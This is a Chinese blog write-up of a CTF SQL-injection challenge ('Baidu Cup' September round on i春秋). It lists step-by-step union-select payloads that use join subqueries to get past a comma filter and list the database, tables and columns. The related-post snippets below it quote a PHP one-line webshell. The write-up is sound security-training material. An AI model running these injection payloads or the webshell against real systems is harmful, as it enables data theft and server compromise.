“百度杯”CTF比赛 九月场SQLi ---------mozhe

最新推荐文章于 2022-10-07 21:56:38 发布
最新推荐文章于 2022-10-07 21:56:38 发布
阅读量1.5k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_40709439/article/details/82027422
本文围绕https://www.ichunqiu.com/battalion链接展开SQL注入测试。起初未在login.php?id=1发现注入点,后在index.php找到真正注入点。单引号检测报错,逗号被过滤,采用join绕过。通过构造语句实现查询,依次查询数据库、表、列和字段,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接:https://www.ichunqiu.com/battalion

点击进去,查看源代码

 发现login.php?id=1

一般是存在sql注入的,可是我测试了好几遍,sqlmap也跑过了,也没发现啥

没办法,查看了官方wp,说是存在index.php,并在其header头有真正的注入点

在index.php请求进行301重定向,明显发现上面的链接只差一个字母,我的是直接看到注入点l0gin.php?id=1。不能直接看到的要在header请求b68a89d1c4a097a9d863lb3ac45e8979.php

来到正确的注入页面

发现一个部分的表图 ,从表的结构可以知道字段为2

单引号检测,直接查询报错

那就 ' order by 1,2#

直接过滤了逗号后面的语句,并且id回显的是过滤后的语句

百度一波,逗号绕过注入

join 绕过

构造语句:1'  union select * from (select 1) a join (select 2 ) b %23

发现回显正常,照上面分析,id会回显过滤后的sql语句(1'  union select * from (select 1) a join (select 2 ) b %23)才对

这里没有回显,说明注入语句执行成功,因为是联合查询,union 前后的两个注入语句都是执行成功的。而这里第一个执行的结果输出了,以致第二个sql查询结果无法显示出来。

那我们可以让第一个结果执行为空,第二个就可以显示出来了

id=3的时候,username是空的

直接构造语句:3'  union select * from (select 1) a join (select 2 ) b %23

正常回显查询的字段

现在查询数据库

3'  union select * from (select 1) a join (select database() ) b %23

 

查询表

3'  union select * from (select 1) a join (select table_name from information_schema.tables where table_schema='sqli' ) b %23

得到user表(不贴图)

查询列

3'  union select * from (select 1) a join (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users'  ) b #

(这里连接字符函数换成limit也可以,不过照样的绕过逗号)

查询字段

get flag

百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 500
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 753
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
百度CTF比赛 九月 SQL
SPS98
11-02 373
先放下参考链接:大方子的WP 还有自己以前写的mysql注入 —— union 平台那边的题目是这样的 很明确说是SQL注入,然后打开容器 很明显是要对id进行注入, 先不着急注入, 把id值变换看看 表面看上去只有两条数据的样子 那就先试下常用操作, 在1后面加个' 没有反应, 应该是出错或者屏蔽报错, 再加个#看看 依旧没反应, 再去掉' 从而可以推测出查询语句应该是sele...
百度CTF比赛 九月 SQLi
weixin_43858799的博客
05-19 817
1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路 2、根据提示flag在后台 用bp抓包进行测试 看到 login.php?id=1 通过URL进行访问 发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息 最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示 通过URL访问...
百度CTF比赛 九月 SQLi
feng的博客
09-11 353
这题主要涉及SQL注入的相关知识,涉及的绕过是过滤了逗号后面的语句
百度CTF比赛 九月 SQLI
wyj_1216 House
04-06 378
题目来源 i春秋题库 writeup 1、一开始进去,啥都没有,那就查看页面源代码看看吧 发现了login.php?id=1 2、于是,进入到此页面看看 尝试进行注入,发现,并不是真正的注入点。 3、那就一起来找一下注入点吧 这里有个很坑的地方!!! 存在跳转!!! 具体发现方法,我也是拜读了大佬的博客才发现的 注意看上面两张图片, 发现了隐藏起来的关键点:l0gin.php?id=1 ...
sqli-labs靶练习笔记
11-09
### SQLi-Labs靶练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
网络安全CTFsqli-labs-master
最新发布
01-02
网络安全CTFsqli-labs-master是一个专门为网络安全爱好者和学习者设计的实践平台,旨在帮助他们通过实际操作提升对SQL注入攻击的理解和应对能力。该靶包含了一系列精心设计的挑战,每个挑战都旨在教授参与者...
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
sqli-labs-php7-master.zip
04-06
在网络安全领域,CTF(Capture The Flag)比赛是一种常见的技术竞技形式,它旨在提升参赛者的网络安全技能,特别是对于Web安全的理解。在这个背景下,"sqli-labs-php7-master.zip"是一个专为Web安全学习者设计的练习...
百度CTF比赛 九月 SQL-writeup
wyj_1216 House
04-05 677
题目来源: “百度CTF比赛 九月 SQL(i春秋CTF题库) http://5a2ac0925dcc43de96dd1453e3b6c1e348f7b2c59f7c4fbd.changame.ichunqiu.com/index.php?id=1 writeup 1、判断有无注入点 发现,有过滤,尝试许多,参考大神思路,发现<>绕过and过滤 继续判断注入点有无 发现无...
百度CTF比赛 九月 SQL
weixin_43858799的博客
05-19 299
1、打开题目 提示flag通过注入拿到 2、开始常规的进行SQL注入 输入‘ order by 1 发现被过滤了 字符&&和||替换进行替换and 和or 发现没有显示过滤 发现order by被拦截 同样注释/**/也会被拦截。尝试用<>把字符隔 开。这里需要注意or<>der隔开是不对的,因为or又是一个被拦截的字符 所以使用 1’ o<&...
【SQL注入】CTF练习题WriteUp——“百度CTF比赛 九月SQL
Fighting_hawk的博客
05-17 4021
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
百度CTF比赛 九月 SQLi 解题思路
****的博客
10-15 1231
题目简介 题目名称:SQLi 题目内容:后台有获取flag的线索 解题思路 打开地址使用burp抓包发现“l0gin.php?id=1”。 打开“l0gin.php?id=1”地址 使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。 开始注入 猜测数据库名称 猜测数据库名...
百度CTF比赛 九月 题目名称:SQLi 后台有获取flag的线索
qq_41168609的博客
07-23 903
百度CTF比赛 九月 题目名称:SQLi 后台有获取flag的线索解题思路 解题思路 1. 具有SQL注入点连接: http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id 2. 逗号之后被截断了,使用无逗号注入mysql无逗号的注入技巧 3. 判断字段个数 (SQL语句出错时,id原样输出) payload: l0gin.php?id=1%27%20order%20by%2
[百度] 九月第二周 Sqli writeup
Flyour的博客
04-01 1857
这道sql注入题折磨了我相当久,痛哭流涕啊! 拿到题,访问url: http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php 老套路,先看源码,提示 login.php?id=1 ,心里想着都是套路,然后访问url: http:...
i春秋 “百度CTF比赛 九月 SQLi
include_heqile的博客
09-13 1146
https://www.ichunqiu.com/battalion?t=1&amp;r=0 这道题相当坑爹,我是看了writeup才知道该怎么做 进入题目链接后查看源代码,提示说注入点是login.php,但是这个注入点是假的,累死你也注不出来任何内容,看一下题目链接和点进去之后浏览器搜索框上的链接,两者其实是不一样的: 题目链接:http://bc9dbb2a422b452ca6bcdf...
百度CTF比赛 九月 sql
whisper_ZH的博客
09-22 210
进入题目 url中 id=1 瞩目 加上题目为sql对id为注入点开启搞! 小试以下,果然被过滤了… 开启burp看看哪些字被过滤!------果然该过滤的都过滤了。。。 具体大概过滤了 or ;and ;select ;order by ;url编码也不行-.- 试一下/**/分割关键字 无用… 头疼了很久,发现<>可以绕过,盲猜可能是设置了代码过滤...
ctf(EasySQL)
Glacier_Mount的博客
10-07 784
查询语句的简单猜测
掌握SQL注入:CTF挑战赛中的SQLi-CTF-master教程
9. 编写报告:在CTF竞赛中,参与者不仅要成功利用漏洞,还需要撰写报告来解释他们的发现,这包括漏洞描述、利用过程和潜在的影响,这对于提高沟通和报告技巧很有帮助。 10. 遵循规则:CTF竞赛通常有一套规则来确保...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值